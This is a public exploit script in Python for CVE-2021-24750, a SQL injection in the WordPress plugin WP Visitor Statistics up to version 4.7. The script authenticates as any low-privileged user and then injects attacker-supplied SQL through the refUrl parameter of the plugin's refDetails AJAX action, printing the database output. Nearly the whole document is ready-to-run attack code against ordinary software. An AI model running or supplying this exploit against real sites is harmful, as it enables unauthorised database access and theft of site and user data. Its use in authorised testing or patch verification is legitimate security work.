WordPress WP Visitor Statistics 4.7 SQL Injection

`# Exploit Title: WordPress Plugin WP Visitor Statistics 4.7 - SQL Injection  
# Date 22/12/2021  
# Exploit Author: Ron Jost (Hacker5preme)  
# Vendor Homepage: https://www.plugins-market.com/  
# Software Link: https://downloads.wordpress.org/plugin/wp-stats-manager.4.7.zip  
# Version: <= 4.7  
# Tested on: Ubuntu 18.04  
# CVE: CVE-2021-24750  
# CWE: CWE-89  
# Documentation: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-24750/README.md  
  
'''  
Description:  
The plugin does not properly sanitise and escape the refUrl in the refDetails AJAX action,  
available to any authenticated user, which could allow users with a role as low as  
subscriber to perform SQL injection attacks  
'''  
  
# Banner:  
banner = '''  
___ _ _ ____ ___ ___ ___ __ ___ __ ___ ___ ___   
/ __)( \/ )( ___)___(__ \ / _ \(__ \ / )___(__ \ /. |(__ )| __) / _ \   
( (__ \ / )__)(___)/ _/( (_) )/ _/ )((___)/ _/(_ _)/ / |__ \( (_) )  
\___) \/ (____) (____)\___/(____)(__) (____) (_)(_/ (___/ \___/   
  
[+] WP Visitor Statistics SQL Injection  
[@] Developed by Ron Jost (Hacker5preme)  
  
'''  
print(banner)  
  
import argparse  
import requests  
from datetime import datetime  
  
# User-Input:  
my_parser = argparse.ArgumentParser(description='Wordpress Plugin WP Visitor Statistics - SQL Injection')  
my_parser.add_argument('-T', '--IP', type=str)  
my_parser.add_argument('-P', '--PORT', type=str)  
my_parser.add_argument('-U', '--PATH', type=str)  
my_parser.add_argument('-u', '--USERNAME', type=str)  
my_parser.add_argument('-p', '--PASSWORD', type=str)  
my_parser.add_argument('-C', '--COMMAND', type=str)  
args = my_parser.parse_args()  
target_ip = args.IP  
target_port = args.PORT  
wp_path = args.PATH  
username = args.USERNAME  
password = args.PASSWORD  
command = args.COMMAND  
  
print('')  
print('[*] Starting Exploit at: ' + str(datetime.now().strftime('%H:%M:%S')))  
print('')  
  
# Authentication:  
session = requests.Session()  
auth_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-login.php'  
check = session.get(auth_url)  
# Header:  
header = {  
'Host': target_ip,  
'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0',  
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',  
'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',  
'Accept-Encoding': 'gzip, deflate',  
'Content-Type': 'application/x-www-form-urlencoded',  
'Origin': 'http://' + target_ip,  
'Connection': 'close',  
'Upgrade-Insecure-Requests': '1'  
}  
  
# Body:  
body = {  
'log': username,  
'pwd': password,  
'wp-submit': 'Log In',  
'testcookie': '1'  
}  
auth = session.post(auth_url, headers=header, data=body)  
  
# Exploit:  
exploit_url = 'http://' + target_ip + ':' + target_port + '/wordpress/wp-admin/admin-ajax.php?action=refDetails&requests={"refUrl":"' + "' " + command + '"}'  
exploit = session.get(exploit_url)  
print(exploit.text)  
print('Exploit finished at: ' + str(datetime.now().strftime('%H:%M:%S')))  
  
`